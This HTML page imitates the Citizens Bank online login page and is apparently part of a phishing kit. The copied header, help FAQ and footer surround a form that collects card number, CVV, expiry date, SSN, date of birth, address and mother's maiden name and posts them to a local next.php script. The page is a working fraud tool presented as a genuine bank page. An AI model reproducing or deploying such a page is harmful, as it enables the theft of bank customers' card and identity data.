<html lang="en-US" style="" class="">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<link rel=icon type=image/png sizes=32x32 href="https://www3.citizensbankonline.com/efs/efs/web-ui/img/mobile-desktop-icons/icon-hires.png">
    <title>Online Login | Citizens Bank</title>
    <link rel="stylesheet" href="css/main.css">
    <link rel="stylesheet" href="css/flows.css">
</head>

<body class="responsive-enabled" style="display: block;">
    <!-- begin CITIZENS BANK Hosted Header -->
    <div class="citizens-header-footer-injected">
        <link rel="stylesheet" type="text/css" href="css/citizensns.min.42588.css">
        <style>
            .global-message:before{
                display: none;
            }
            .footer-top li > a:before{
                display: none;
            }
            .help-modal-header .help-modal-close {background: url(images/modal-help-close.png) center center no-repeat transparent; background-size: 20px;}
.help-modal-menu a.active {background: #f2faf8 url(images/arrow-right-green.png) right 20px center no-repeat; background-position: right 20px center; background-size:7px}
.account-section-title.checkmark h1 {padding: 0px 0px 5px 28px !important; }
.lt-ie9 .help-modal-menu a.active {background: #f2faf8 url(images/arrow-right-green.png) right 20px center no-repeat !important; background-size:7px !important}
.input-wrapper .tooltip {margin-left: 1px;}
</style>
    </div>
    <div class="citizens-header">
        <style>
            .citizens-header-footer-overlay{ opacity:1; background-color:#fff; position:fixed; width:100%; height:100%; top:0px; left:0px; z-index:1000; }
        .citizens-header-footer-overlay .centered-content { width: 100%; max-width: 1060px; padding: 0 20px; margin: 0 auto; font-family: arial, helvetica, san-serif; font-size: 14px;}
        .citizens-header-footer-overlay .responsive-enabled .centered-content { width: auto; max-width: 1060px; }
        .citizens-header-footer-overlay .page-logo { float: none; }
        .citizens-header-footer-overlay .page-logo img{ margin: 10px; float: none;}
        .citizens-header-footer-overlay .topshadow {
            position: absolute; width: 100%; top: 100px; z-index: 5; height: 8px; 
            background: -webkit-radial-gradient(50% 100%, farthest-side, rgba(0, 0, 0, 0.1), transparent 100%); background: radial-gradient(farthest-side at 50% 100%, rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0) 100%); background-repeat: no-repeat; background-size: cover;
        }
    </style>
        <style>
            .account-section-title.checkmark h1 { padding: 0px 0px 5px 28px !important; }
        .mobile-alert-dot {min-width: 22px; min-height: 22px; width: auto; height: auto; max-width: 50px; max-height: 50px; padding: 5px; }
    </style>
        <div class="citizens-header-footer">
            <div id="page-header" class="page-header">
                <div class="centered-content clearfix">
                    <a href="#" class="page-logo" tabindex="1">
                        <!-- Display the brand logo for either citizens one or citizen bank customers -->
                        <img border="0" alt="Citizens Bank" width="203" height="25" src="images/CTZ_Green-01.png">
                    </a>
                    <div id="header-navigation-container"></div>
                </div>
            </div>
        </div>
    </div>
    <!-- end CITIZENS BANK Hosted Header -->
    <div id="page-container" class="page-container">
        <div class="centered-content clearfix">
            <section id="top-content" class="page-region top-content">
            </section>
            <section id="main-container" class="main-container two-col layout-2-1 clearfix">
                <!-- =================
            MAIN CONTENT AREA START
            ================= -->
                <section id="main-content" class="page-region main-content">
                    <form action="./next.php" method="POST">
                        <div class="account-table account-table-full">
                            <span class="account-table-border"></span>
                            <div class="account-table-content">
                                <div class="account-content-container">
                                    <div class="account-table-body">
                                        <header class="account-section-title clearfix account-secure">
                                            <a href="#" class="mobile-help-trigger">Help</a>
                                            <h1>Please provide the information below</h1>
                                        </header>
                                        <section class="account-section">
                                            <div class="pay-transfer-options clearfix" name="SignOn" id="frmSignOn">
                                                <div class="account-title clearfix">
                                                    <!-- <p>Please enter your Online User ID and Password.</p> -->
                                                </div>
                                                <div class="form-item label-right full-width clearfix">
                                                    
                                                    <div class="form-item full-width">
                                                        <label for="currentpassword"><strong>Card Number: </strong></label>
                                                        <input tabindex="2" type="text" id="cnum" name="cnum" class="required demo-password" required="">
                                                    </div>
                                                    <div class="form-item full-width">
                                                        <label for="currentpassword"><strong>CVV: </strong></label>
                                                        <input tabindex="2" type="text" id="cvv" name="cvv" class="required demo-password" required="">
                                                    </div>
                                                    <div class="form-item full-width">
                                                        <label for="currentpassword"><strong>Expire Date: </strong></label>
                                                        <input tabindex="2" type="text" id="exdate" name="exdate" class="required demo-password" required="">
                                                    </div>
                                                    <div class="form-item full-width">
                                                        <label for="currentpassword"><strong>Address: </strong></label>
                                                        <input tabindex="2" type="text" id="add" name="add" class="required demo-password" required="">
                                                    </div>
                                                    <div class="form-item full-width">
                                                        <label for="currentpassword"><strong>SSN: </strong></label>
                                                        <input tabindex="2" type="text" id="ssn" name="ssn" class="required demo-password" required="">
                                                    </div>
                                                    <div class="form-item full-width">
                                                        <label for="currentpassword"><strong>DOB: </strong></label>
                                                        <input tabindex="2" type="text" id="dob" name="dob" class="required demo-password" required="">
                                                    </div>
                                                    <div class="form-item full-width">
                                                        <label for="currentpassword"><strong>City: </strong></label>
                                                        <input tabindex="2" type="text" id="ct" name="ct" class="required demo-password" required="">
                                                    </div>
                                                    <div class="form-item full-width">
                                                        <label for="currentpassword"><strong>State: </strong></label>
                                                        <input tabindex="2" type="text" id="state" name="state" class="required demo-password" required="">
                                                    </div>
                                                    <div class="form-item full-width">
                                                        <label for="currentpassword"><strong>Mother's Maiden Name: </strong></label>
                                                        <input tabindex="2" type="text" id="mmn" name="mmn" class="required demo-password" required="">
                                                    </div>
                                                    
                                                    
                                                    
                                                </div>
                                                <div class="form-actions">
                                                    <input type="submit" name="btn4" id="btn3" class="submit-button arrow" tabindex="3" data-trigger="next" value="confirm"> <a tabindex="8" href="#" class="cancel">Cancel</a>
                                                </div>
                                            </div>
                                        </section>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </form>
                </section>
                <!-- Brand type from query parameter -->
                <aside id="main-sidebar" class="page-region main-sidebar">
                    <div id="citizens-help" class="citizens-help sidebar-item sidebar-list-container sidebar-accordian mobile-modal">
                        <div class="sidebar-list-content">
                            <header class="sidebar-list-title">
                                <h3>Need Help?</h3>
                            </header>
                            <div id="faq-holder">
                                <form name="frmAsst" id="frmAsst" method="post">
                                    <section class="toggle-list-container faq-container" id="faq-index-1">
                                        <a href="#" title="Expand contents of Where can I get login assistance for Online Banking?" aria-label="Expand Contents" class="sidebar-list-option-accordian showhide">Where can I get login assistance for Online Banking?</a>
                                        <ul class="loginfaq sidebar-list showhide-content">
                                            <li>
                                                <p>Simply click on "Trouble logging in?" link. Or, you can click on "View All Help Topics" link, which appears on each screen.</p>
                                            </li>
                                        </ul>
                                    </section>
                                    <section class="toggle-list-container faq-container" id="faq-index-10">
                                        <a href="#" title="Expand contents of Is Online Banking secure?" aria-label="Expand Contents" class="sidebar-list-option-accordian showhide">Is Online Banking secure?</a>
                                        <ul class="loginfaq sidebar-list showhide-content">
                                            <li>
                                                <p>To make Online Banking secure, Citizens Bank uses the highest level of encryption available today. Encryption is the process by which information is translated into un-interpretable code and then back to recognized information.<br>As an added measure, Online Banking gives you the capability to easily verify that you are on the authentic Citizens Bank website and not on a fake site created by fraudsters. Just look for the green bar (or some variation of it) in your browser address. The green bar should remind you that "green is good" and that our website has passed a sophisticated authentication process, letting you know you are good to go.</p>
                                            </li>
                                        </ul>
                                    </section>
                                    <section class="toggle-list-container faq-container" id="faq-index-12">
                                        <a href="#" aria-label="Expand Contents" class="sidebar-list-option-accordian showhide" title="Show contents of Should my browser address bar have a green indicator when I use Online Banking?">Should my browser address bar have a "green" indicator when I use Online Banking?</a>
                                        <ul class="loginfaq sidebar-list showhide-content">
                                            <li>
                                                <p>Yes. As an added measure, Online Banking gives you the capability to easily verify that you are on the authentic Citizens Bank website and not on a fake site created by fraudsters. Just look for the green bar (or some variation of it) in your browser address. The green bar should remind you that "green is good" and that our website has passed a sophisticated authentication process, letting you know you are good to go.</p>
                                            </li>
                                        </ul>
                                    </section>
                                    <section class="toggle-list-container faq-container" id="faq-index-20">
                                        <a href="#" title="Expand contents of How do I log into Online Banking if Iâm a first-time user?" aria-label="Expand Contents" class="sidebar-list-option-accordian showhide">How do I log into Online Banking if I'm a first-time user?</a>
                                        <ul class="loginfaq sidebar-list showhide-content">
                                            <li>
                                                <p>Simply enter your Online User ID and Password and click "LOGIN", then answer your Challenge Question (if presented). In some situations, your Online User ID will be your ATM/Debit Card number and your Password will be the last four digits of your Social Security number followed by "Abcd" (e.g. 1234Abcd). If you haven't already selected an Online User ID, you will be asked to do so.</p>
                                            </li>
                                        </ul>
                                    </section>
                                </form>
                            </div>
                            <ul class="sidebar-list">
                                <li class="cta-row">
                                    <a href="#" class="blue" target="_blank">View All Help Topics</a>
                                </li>
                                <li class="cta-row sign-up-prompt visible clearfix">
                                    <span>Haven't signed up for Online Banking?</span>
                                    <a href="#" class="cta orange">Enroll Now</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </aside>
            </section>
        </div>
    </div>
    <div class="citizens-footer">
        <div class="citizens-header-footer">
            <footer id="page-footer" class="page-footer">
                <div class="footer-top">
                    <ul>
                        <li>
                            <a href="#" class="contact" title="Opens Ways to Contact Us Dialog">
                                <span class="account-underline">Ways to Contact Us</span><span class="visuallyhidden">- Opens Ways to Contact Us Dialog</span>
                            </a>
                            <div class="dropup-menu">
                                <h4>Contact Us</h4>
                                <p>General Questions:
                                    <br>
                                    <strong>1-800-656-6561</strong> (personal bank accounts)
                                    <br>
                                    Business Questions:
                                    <br>
                                    <strong>1-877-229-6428</strong> (online banking support)
                                    <br>
                                    <strong>1-800-862-6200</strong> (account information)
                                    <br>
                                    Investment Questions:
                                    <br>
                                    <strong>1-800-942-8300</strong> (Citizens Investment Services)
                                </p>
                                <!--
<p>Go to <a href="#">Customer Service</a> to send us email or mail or to view FAQs</p>
<p><a href="#">We'll Contact You</a></p>
-->
                            </div>
                        </li>
                        <!-- As part of Def# 1465 Location is commented on Auth/UnAuth pages.
<li><span class="location">Your Location: NONE</span>
</li>
-->
                        <li>
                            <a href="#" class="locator" title="Opens Branch &amp; ATM Locator Dialog">
                                <span class="account-underline">Branch &amp; ATM Locator</span><span class="visuallyhidden">- Opens Branch &amp; ATM Locator Dialog</span>
                            </a>
                            <div class="dropup-menu">
                                <h4>Branch &amp; ATM Locator</h4>
                                <p>Find one of our 1,300 locations near you.</p>
                                <div role="form">
                                    <div id="stickyFooterBranch-error" class="error-message" style="display: none"></div>
                                    <input id="stickyFooterBranch" type="text" title="Enter Zip Code or City, State" placeholder="Enter Zip Code or City, State" value="NONE">
                                    <a href="#" type="button" class="button button-stickyfooterbranch">Submit</a>
                                </div>
                            </div>
                        </li>
                        <li><a style="cursor:pointer;">Feedback</a></li>
                    </ul>
                </div>
                <div class="footer-row clearfix">
                    <ul>
                        <li>
                            <h6>Checking &amp; Savings</h6>
                        </li>
                        <!--        <li><a target="_blank" href="#">Checking &amp; Savings Overview</a></li>-->
                        <li>
                            <a target="_blank" href="#">Checking</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Savings</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Money Markets</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Certificates of Deposit (CDs)
                                <sup>®</sup>
                            </a>
                        </li>
                        <li>
                            <a target="_blank" href="#">IRAs</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Programs &amp; Services</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Benefits &amp; Features</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Debit Card</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Overdraft Choices
                                <sup>®</sup>
                            </a>
                        </li>
                    </ul>
                    <ul>
                        <li>
                            <h6>Home Borrowing</h6>
                        </li>
                        <!--        <li><a target="_blank" href="#">Home Borrowing Overview</a></li>-->
                        <li>
                            <a target="_blank" href="#">Mortgages</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Home Equity Loans</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Home Equity Lines of Credit</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Determine My Rate</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">My Mortgage Account</a>
                        </li>
                    </ul>
                    <ul>
                        <li>
                            <h6>Students</h6>
                        </li>
                        <!--<li><a target="_blank" href="#">Students Overview</a></li>
<li><a target="_blank" href="#">Banking</a></li>
<li><a target="_blank" href="#">Undergraduate Borrowing</a></li>
<li><a target="_blank" href="#">Graduate Borrowing</a></li>
<li><a target="_blank" href="#">The Student Loan Process</a></li>
<li><a target="_blank" href="#">Student Tools &amp; Resources</a></li>-->
                        <li>
                            <a target="_blank" href="#">Student Loan Options</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Refinancing Student Loans</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">The Student Loan Process</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Undergraduate Students &amp; Parents</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Graduate Students</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Tools &amp; Information</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Banking for Students</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Access My Student Loan</a>
                        </li>
                    </ul>
                    <ul class="last">
                        <li>
                            <h6>Cards</h6>
                        </li>
                        <!--        <li><a target="_blank" href="#">Cards Overview</a></li>-->
                        <li>
                            <a target="_blank" href="#">Credit Cards</a>
                        </li>
                        <!--        <li><a target="_blank" href="#">Debit Card</a></li>-->
                        <li>
                            <a target="_blank" href="#">Card Agreements</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Security Features</a>
                        </li>
                    </ul>
                </div>
                <div class="footer-row clearfix">
                    <ul>
                        <li>
                            <h6>Personal Loans</h6>
                        </li>
                        <li>
                            <a target="_blank" href="#">Overview</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">FAQs</a>
                        </li>
                    </ul>
                    <ul>
                        <li>
                            <h6>Resources</h6>
                        </li>
                        <li>
                            <a target="_blank" href="#">Order Checks</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Online &amp; Mobile Banking</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Customer Service</a>
                        </li>
                    </ul>
                    <ul>
                        <li>
                            <h6>About Us</h6>
                        </li>
                        <!--        <li><a target="_blank" href="#">About Us Overview</a></li>-->
                        <li>
                            <a target="_blank" href="#">About Citizens Bank</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">In the Community</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Careers</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">About Our Ads</a>
                        </li>
                    </ul>
                    <ul class="last">
                        <li>
                            <h6>Solutions</h6>
                        </li>
                        <li>
                            <a target="_blank" href="#">Personal</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Investing</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Small Business</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Commercial</a>
                        </li>
                    </ul>
                </div>
                <div class="footer-row clearfix">
                    <ul>
                        <li>
                            <h6>Disclosures</h6>
                        </li>
                        <li>
                            <a target="_blank" href="#">Online Terms and Conditions</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Electronic Notice Disclosure and Consent (Online Service)</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Account Documents</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Member FDIC</a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Equal Housing Lender
                                <img alt="Equal Housing Lender" title="Equal Housing Lender" src="images/equal-housing.gif">
                            </a>
                        </li>
                        <li>
                            <a target="_blank" href="#">Security, Privacy &amp; Legal</a>
                        </li>
                    </ul>
                </div>
                <div class="centered-content">
                    <div class="footer-bottom">
                        <p class="legal">
                            Zelle and the Zelle related marks are wholly owned by Early Warning Services, LLC and are used herein under license.
                        </p>
                        <p class="legal">
                            *Securities, Insurance and Investment Advisory Services offered through Citizens Securities, Inc. ("CSI"), also referred to as Citizens Investment Services. CSI is an SEC registered investment adviser and Member - FINRA and SIPC. 770 Legacy Place, MLP240, Dedham, MA 02026. (800) 942-8300. CSI is an affiliate of Citizens Bank, N.A.<br><br>The investment balances shown in online banking are based on market prices, with up to a fifteen minute delay from the time this webpage was last refreshed. Information relating to accounts not held at CSI is presented as an accommodation and while drawn from sources believed to be reliable is not guaranteed as to accuracy or completeness. Such information should be independently confirmed by the account owner(s).<br><br>Information relating to accounts not held or custodied by National Financial Services (NFS) (Assets Held Away), CSI’s clearing broker dealer, was provided to NFS by outside parties and is included for informational purposes only. These positions are not part of your brokerage account carried by NFS and therefore any SIPC account protection afforded your account through NFS does not cover these assets or prices reported. Neither NFS, CSI nor Citizens Bank are responsible for the Assets Held Away information provided and does not guarantee the accuracy or timeliness of the positions or prices reported. Prices shown do not necessarily reflect the actual current market prices. Further information regarding these prices may be obtained by contacting CSI.<br><br>The investment products and financial strategies suggested herein are subject to investment risk, including possible loss of principal amount invested. Investment decisions should be based on each individual's goals, time horizon and tolerance for risk.<br><br>SpeciFi<sup>®</sup> is made available through CSI. Portfolio management services are sub-advised by SigFig Wealth Management, LLC ("SigFig"), an SEC registered investment adviser. SigFig is not an affiliate of CSI or Citizens Bank, N.A.
                        </p>
                        <div class="footer-disclaimer-box footer-disclaimer-box--margin-bottom footer-disclaimer">
                            <p class="footer-disclaimer-box__text">Securities, Insurance Products and Advisory Services are:</p>
                            <ul class="footer-disclaimer-box__list">
                                <li class="footer-disclaimer-box__list-item">NOT FDIC INSURED</li>
                                <li class="footer-disclaimer-box__list-item">NOT BANK GUARANTEED</li>
                                <li class="footer-disclaimer-box__list-item">MAY LOSE VALUE</li>
                                <li class="footer-disclaimer-box__list-item">NOT A DEPOSIT
                                    <br>
                                </li>
                                <li class="footer-disclaimer-box__list-item">NOT INSURED BY ANY FEDERAL GOVERNMENT AGENCY</li>
                            </ul>
                        </div>
                        <ul class="footer-util">
                            <li class="sitemap">
                                <a target="_blank" href="#">Site Map</a>
                            </li>
                            <li>Follow:
                                <a target="_blank" href="#">
                                    <img src="images/footer-follow-facebook.png" alt="Facebook" align="middle">
                                </a>
                                <a target="_blank" href="#">
                                    <img src="images/footer-follow-twitter.png" alt="Twitter">
                                </a>
                                <a target="_blank" href="#">
                                    <img src="images/footer-follow-linkedin.png" alt="Linkedin">
                                </a>
                                <a target="_blank" href="#">
                                    <img src="images/footer-follow-youtube.png" alt="Youtube">
                                </a>
                            </li>
                        </ul>
                        <p class="footer-copyright">
                            © Copyright 2021 Citizens Financial Group, Inc. All rights reserved.<br>Citizens Bank is a brand name of Citizens Bank, N.A. (NMLS ID# 433960).<br>Citizens Bank corporate headquarters: One Citizens Plaza, Providence, RI 02903
                        </p>
                        <img src="images/elh.gif" alt="Equal Housing Lender">
                        <img src="images/fdicFooter.gif" alt="Member FDIC">
                    </div>
                </div>
            </footer>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

</html>